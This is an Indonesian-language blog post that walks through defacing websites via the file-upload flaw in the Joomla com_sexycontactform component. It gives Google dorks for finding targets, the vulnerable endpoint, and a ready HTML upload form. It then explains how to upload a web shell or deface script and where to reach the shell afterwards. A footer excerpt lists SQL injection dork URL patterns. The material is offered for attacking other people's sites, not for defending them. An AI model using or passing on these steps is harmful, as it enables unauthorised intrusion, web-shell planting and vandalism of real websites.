Langsung ke konten utama

Deface Metode Com_Sexy

Bahan-Bahan :

.Dork : inurl:/com_sexycontactform/ site:id <<--- bisa diganti contoh: .com.br, co.uk , .il ,.net dll
            inurl:/components/com_sexycontactform/ black
            inurl:/components/com_sexycontactform/ intext:copyright 2015
            inurl:/components/com_sexycontactform/ index of
            inurl:/components/com_sexycontactform/ intittle: " index of "

.eksploit : /components/com_sexycontactform/fileupload/index.php

.shell kamu
Langkah":
1.masukkan dork ke google lalu cari target ..
2.lalu untuk mengecheck itu vuln atau tidak bisa dengan cara memasukkan exploit dibelakang url target
contoh: www.local.com/components/com_sexycontactform/fileupload/index.php lalu enter ..
3.kalo ada tulisan file [] atau semacam nya bla bla itu VULn bisa dideface ..
4.kalo error / not found atau kembali ke halaman awal itu gak Vuln .
5.lalu setelah mendapat yg vuln, siapkan exploit ..
copy code ini CSRF ini  :


<form method="POST" action="http://www.target.com/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>



PASTE KODE ITU KE NOTEPAD , NAH MASUKKAN TARGET KE DALAM KODE ITU , DISITU ADA BACAAN WWW.TARGET.COM , GANTI DENGAN SITE TARGET ..
LALU SAVE ..
SETELAH DISAVE , BUKA ITU DENGAN CARA KLIK 2 KALI ..
SETELAH KEBUKA MAKA AKAN MUNCUL TEMPAT UPLOAD , MAKA UPLOAD SHELL ABANG ..
KALO BERHASIL NANTI AKAN KELUAR SUCCESS / KELUAR URL LETAK SHELL ABANG ..
KALO FALSE ATAU ERROR BERARTI GAK BISA UPLOAD SHELL , MAKA GANTI SAJA DENGAN UPLOAD
SCRIPT DEFACE KAMU ..

AKSES SHELL:
http://www.target.com/components/com_sexycontactform/fileupload/files/namashell.php <<--- nama shell kamu ..

Komentar

Postingan populer dari blog ini

Dork SQL injection Terbaru 2015

ListElement.asp?segid= detail?date= offer_detail.php?oid= item.php?it_id= include_pictures.php?id= recommend.php?item_id= index.php?controller= index.php&limite= pressrelease.php?viewpr= project.asp?id= browse.php?sort= View-Poetry.php?book_id= contacts.php?ofc= reservations.asp?heure= guitartab.asp?idMusica= showthread.php?t= ocasion.php&limite= browse.php?sort= details.asp?ID= view.php?client= comment.php?postid= detailtrip.php?trip_id= video.php?video= mapinfo.asp?map= contorno.php?&offset= street.php?region= vr_viewer.asp?vr_iid= ficha.php?producto= index.php?uid= Listing.SendToCell.asp?Lid= detailnews.php?id= article.php?id= message.php?act= direct_product.php?ID= index.php?id= detalle.php?id= troubleshooting.php?trouble_no= links.asp?gotolink= kom_award.php?page= icons.php?start= group_posts.php?gid= index.php?page= listing.php?listing_id= resultado.php?c= ListInfo.asp?UserID= g...